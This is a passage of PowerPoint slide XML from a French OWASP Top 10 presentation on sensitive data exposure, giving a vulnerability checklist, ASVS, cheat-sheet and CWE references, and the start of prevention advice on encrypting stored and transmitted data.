              <a:rPr lang="fr-CH" sz="1000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) lui révèle les mots de passe.</a:t>
            </a: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fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis-je vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Déterminer d’abord quelles données doivent bénéficier d’une protection cryptographique (mots de passe, données patient, numéros de cartes, données personnelles, etc.), lors de leur transfert et/ou leur stockage. Pour chacune de ces données:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les données sont-elles stockées/archivées en clair? Qu’en est-il des sauvegardes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les données circulent-elles en clair? Sur le réseau interne? Externe? Et sur Internet? (très risqué) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Des algorithmes faibles ou désuets sont-ils utilisés?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les clés sont-elles robustes? Leur gestion et rotation sont-elles prises en charge?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les réponses transmises au navigateur incluent-elles les directives/en-têtes de sécurité adéquats?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour une liste complète de contrôles, se référer à l’ASVS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7), Data Protection. (V9), SSL (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRP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fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Recommandations et contrôles du référentiel ASVS:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> (V7), Data Protection (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  et  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Communications Security (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> Storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> Storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Transport Layer Protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> Guide: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> on SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références externes:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE 310 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Issues</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE 312 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE 319 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> Transmission of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE 326 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>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fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment s'en prémunir?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’intégralité des écueils liés à l’usage de la cryptographie lors du transport et stockage de données sensibles dépasse le périmètre du Top 10. Au minimum, l’on veillera toutefois à:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifier les menaces contre lesquelles l’on souhaite se protéger (ex.: menace interne, utilisateurs externes) et s’assurer que les données sensibles sont chiffrées correctement lors de leur stockage et de leur transport..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ne conserver que les données sensibles nécessaires. Les données que l’on ne possède pas ne peuvent être volées!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
